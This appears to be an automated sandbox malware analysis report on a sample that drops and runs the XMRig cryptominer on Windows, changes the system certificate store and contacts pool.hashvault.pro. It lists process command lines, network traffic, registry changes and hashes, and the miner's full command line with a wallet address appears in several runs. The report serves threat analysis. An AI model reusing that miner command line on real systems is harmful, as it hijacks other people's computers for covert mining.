Malware Analysis Report

2025-01-06 21:17

Sample ID 240614-p1mevs1epa
Target packer.zip
SHA256 2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Tags
xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293

Threat Level: Known bad

The file packer.zip was found to be: Known bad.

Malicious Activity Summary

xmrig miner

xmrig

XMRig Miner payload

Executes dropped EXE

Unsigned PE

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 12:49

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A (20 identical rows, all fields N/A)

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4008,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1400,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4072 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
NL 52.142.223.178:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1791s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows, all fields N/A)

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value elided] C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value elided] C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 147.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 214.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/516-14-0x0000020BAC5F0000-0x0000020BAC610000-memory.dmp

memory/516-15-0x0000020BADD50000-0x0000020BADD70000-memory.dmp

memory/516-16-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-18-0x0000020BADD70000-0x0000020BADD90000-memory.dmp

memory/516-17-0x0000020BADD90000-0x0000020BADDB0000-memory.dmp

memory/516-19-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-20-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-23-0x0000020BADD70000-0x0000020BADD90000-memory.dmp

memory/516-22-0x0000020BADD90000-0x0000020BADDB0000-memory.dmp

memory/516-21-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-24-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-25-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-26-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-27-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-28-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-29-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-30-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-31-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-32-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-33-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-34-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-35-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-36-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-37-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-38-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-39-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-40-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-41-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-42-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-43-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-44-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-45-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-46-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-47-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-48-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-49-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-50-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-51-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-52-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-53-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-54-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-55-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-56-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-57-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-58-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-59-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-60-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-61-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-62-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-63-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-64-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-65-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-66-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-67-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-68-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-69-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-70-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-71-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-72-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-73-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-74-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-75-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-76-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-77-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-78-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-79-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-80-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-81-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-82-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1792s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows, all fields N/A)

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value elided] C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.114:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 114.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 213.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3428-14-0x0000016AD7E00000-0x0000016AD7E20000-memory.dmp

memory/3428-15-0x0000016AD9570000-0x0000016AD9590000-memory.dmp

memory/3428-16-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-18-0x0000016AD95B0000-0x0000016AD95D0000-memory.dmp

memory/3428-17-0x0000016AD9590000-0x0000016AD95B0000-memory.dmp

memory/3428-19-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-20-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-23-0x0000016AD95B0000-0x0000016AD95D0000-memory.dmp

memory/3428-22-0x0000016AD9590000-0x0000016AD95B0000-memory.dmp

memory/3428-21-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-24-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-25-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-26-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-27-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-28-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-29-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-30-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-31-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-32-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-33-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-34-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-35-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-36-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-37-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-38-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-39-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-40-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-41-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-42-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-43-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-44-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-45-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-46-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-47-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-48-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-49-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-50-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-51-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-52-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-53-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-54-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-55-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-56-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-57-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-58-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-59-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-60-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-61-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-62-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-63-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-64-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-65-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-66-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-67-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-68-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-69-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-70-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-71-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-72-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-73-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-74-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-75-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-76-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-77-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-78-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-79-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-80-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-81-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-82-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240611-en

Max time kernel

1794s

Max time network

1788s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 identical rows, all fields N/A)

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value elided] C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value elided] C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4776-14-0x000001FEEE690000-0x000001FEEE6B0000-memory.dmp

